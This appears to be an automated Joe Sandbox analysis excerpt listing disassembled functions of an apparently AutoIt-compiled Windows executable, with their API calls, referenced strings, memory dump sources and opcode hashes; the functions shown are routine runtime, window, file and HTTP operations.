                                                                                                                                                                                                                                          Function 000F00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 000F00C6
                                                                                                                                                                                                                                            • Part of subcall function 000F00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(001A070C,00000FA0,EA715799,?,?,?,?,001123B3,000000FF), ref: 000F011C
                                                                                                                                                                                                                                            • Part of subcall function 000F00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001123B3,000000FF), ref: 000F0127
                                                                                                                                                                                                                                            • Part of subcall function 000F00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001123B3,000000FF), ref: 000F0138
                                                                                                                                                                                                                                            • Part of subcall function 000F00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 000F014E
                                                                                                                                                                                                                                            • Part of subcall function 000F00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000F015C
                                                                                                                                                                                                                                            • Part of subcall function 000F00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000F016A
                                                                                                                                                                                                                                            • Part of subcall function 000F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000F0195
                                                                                                                                                                                                                                            • Part of subcall function 000F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000F01A0
                                                                                                                                                                                                                                          • ___scrt_fastfail.LIBCMT ref: 000F00E7
                                                                                                                                                                                                                                            • Part of subcall function 000F00A3: __onexit.LIBCMT ref: 000F00A9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • kernel32.dll, xrefs: 000F0133
                                                                                                                                                                                                                                          • InitializeConditionVariable, xrefs: 000F0148
                                                                                                                                                                                                                                          • WakeAllConditionVariable, xrefs: 000F0162
                                                                                                                                                                                                                                          • SleepConditionVariableCS, xrefs: 000F0154
                                                                                                                                                                                                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 000F0122
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                          • Opcode ID: ab68e0900638e3fe014baa686767730a71266f719150ab7b7bb1d01555e1b14e
                                                                                                                                                                                                                                          • Instruction ID: 6bc20ad92b4dd8fc8129ed2e71b99cc09b85c07873eaaa097d98c33db0eb5bbe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab68e0900638e3fe014baa686767730a71266f719150ab7b7bb1d01555e1b14e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8521F932645755ABE7116BE4AC05B7A33D4FB4AB51F00013AFA41A3E93DFB4A8409A90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001330F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                          • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                          • Opcode ID: 318c96c17776500e49d0b348e6fd8b7a5390f241011e4a9afa7dfade1704986d
                                                                                                                                                                                                                                          • Instruction ID: a4a3e580103606841659b2d6513a6ed467959fa3b861cb6906602a1a4ea783a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 318c96c17776500e49d0b348e6fd8b7a5390f241011e4a9afa7dfade1704986d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AE10532B00616ABCF189FB8C4416FEFBB1BF04710F15811AE466F7241DB30AE8997A4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001444C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CharLowerBuffW.USER32(00000000,00000000,0016CC08), ref: 00144527
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0014453B
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00144599
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001445F4
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0014463F
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001446A7
                                                                                                                                                                                                                                            • Part of subcall function 000EF9F2: _wcslen.LIBCMT ref: 000EF9FD
                                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,00196BF0,00000061), ref: 00144743
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                          • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                          • Opcode ID: 042339827c8c87629548cb765227da83a251ec358220e49b32685203b91ea25c
                                                                                                                                                                                                                                          • Instruction ID: 1abec1fdcaac89d930b22ab7dd71cd9579ed65e9ed020b5206f8123e4315ac29
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 042339827c8c87629548cb765227da83a251ec358220e49b32685203b91ea25c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CB1E0716083029FC714DF28C890ABAB7E5BFA6760F51491DF496D72A2E730D845CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0015B198
                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0015B1B0
                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0015B1D4
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0015B200
                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0015B214
                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0015B236
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0015B332
                                                                                                                                                                                                                                            • Part of subcall function 001405A7: GetStdHandle.KERNEL32(000000F6), ref: 001405C6
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0015B34B
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0015B366
                                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0015B3B6
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 0015B407
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0015B439
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0015B44A
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0015B45C
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0015B46E
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0015B4E3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2178637699-0
                                                                                                                                                                                                                                          • Opcode ID: ec2df6c2b567a10d43f79f04d12291e59a56f7b72cb5b05d1e88974a5b369b11
                                                                                                                                                                                                                                          • Instruction ID: afd2f5ef5f63c8e0d3abe488d344a10166fb4005f41fd028dcff52d5059b9344
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec2df6c2b567a10d43f79f04d12291e59a56f7b72cb5b05d1e88974a5b369b11
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02F16B31608340DFC724EF24C891B6ABBE5AF85315F14855EF8999F2A2DB71EC44CB62
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(001A1990), ref: 00112F8D
                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(001A1990), ref: 0011303D
                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00113081
                                                                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0011308A
                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(001A1990,00000000,?,00000000,00000000,00000000), ref: 0011309D
                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001130A9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                          • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                          • Opcode ID: 5bb44b71b59fb915be3376d20a7266b1d097a6325d4f1ad03cce5b8fe0ec6419
                                                                                                                                                                                                                                          • Instruction ID: 04cb9125223c77362575b196480c804ccfd1b6c16e89586668d136b85ecb9b06
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bb44b71b59fb915be3376d20a7266b1d097a6325d4f1ad03cce5b8fe0ec6419
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E711931644206BEEB359F24CC49FEEBF64FF05324F204216F5256A2E0C7B1A9A0DB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00166CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,?), ref: 00166DEB
                                                                                                                                                                                                                                            • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00166E5F
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00166E81
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00166E94
                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00166EB5
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000D0000,00000000), ref: 00166EE4
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00166EFD
                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00166F16
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00166F1D
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00166F35
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00166F4D
                                                                                                                                                                                                                                            • Part of subcall function 000E9944: GetWindowLongW.USER32(?,000000EB), ref: 000E9952
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                          • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                          • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                          • Opcode ID: 9c62f5e49cf455c24381014a1635b6e3dd9c4fbafa394b4bbd7db384fa34e452
                                                                                                                                                                                                                                          • Instruction ID: 39a355700309ab6b01b8128ab64a8debe2b4c6421537d3fd613a5b34324af842
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c62f5e49cf455c24381014a1635b6e3dd9c4fbafa394b4bbd7db384fa34e452
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD717574104340AFDB21CF28DC58EBABBE9FB99304F04481EF99987261C7B1A966CB55
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0016911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
                                                                                                                                                                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 00169147
                                                                                                                                                                                                                                            • Part of subcall function 00167674: ClientToScreen.USER32(?,?), ref: 0016769A
                                                                                                                                                                                                                                            • Part of subcall function 00167674: GetWindowRect.USER32(?,?), ref: 00167710
                                                                                                                                                                                                                                            • Part of subcall function 00167674: PtInRect.USER32(?,?,00168B89), ref: 00167720
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 001691B0
                                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001691BB
                                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001691DE
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00169225
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0016923E
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00169255
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00169277
                                                                                                                                                                                                                                          • DragFinish.SHELL32(?), ref: 0016927E
                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00169371
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                          • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                          • Opcode ID: 8b5be5822b7a50ec040e27db638679dbc122aed4fd244e13e9dbbf21c9a24cef
                                                                                                                                                                                                                                          • Instruction ID: f3c31dad3d2a07a6ba0026477db686340dda8ffb5ed0395d66e84f7659b1642c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b5be5822b7a50ec040e27db638679dbc122aed4fd244e13e9dbbf21c9a24cef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19615A71108301AFD701EF64DC85DAFBBE8FF89750F40092EF595922A1DB709A49CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0014C4B0
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0014C4C3
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0014C4D7
                                                                                                                                                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0014C4F0
                                                                                                                                                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0014C533
                                                                                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0014C549
                                                                                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0014C554
                                                                                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0014C584
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0014C5DC
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0014C5F0
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0014C5FB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                          • Opcode ID: 4ad72484ebdef0d09d64011113c0f31e0dc627519e35d9b15ce8b818b70c9cc7
                                                                                                                                                                                                                                          • Instruction ID: 02bb53bb653ab7d49d80c4fa53b7b4a0d079a871b4e80425cd4a72604eb23af0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ad72484ebdef0d09d64011113c0f31e0dc627519e35d9b15ce8b818b70c9cc7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66515DB1601209BFDB619FA4CD48ABB7BBCFF08754F008419F98596620DB74E9449BA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0016856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00168592
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685A2
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685AD
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685BA
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685C8
                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685D7
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685E0
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685E7
                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001685F8
                                                                                                                                                                                                                                          • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0016FC38,?), ref: 00168611
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00168621
                                                                                                                                                                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00168641
                                                                                                                                                                                                                                          • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00168671
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00168699
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001686AF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
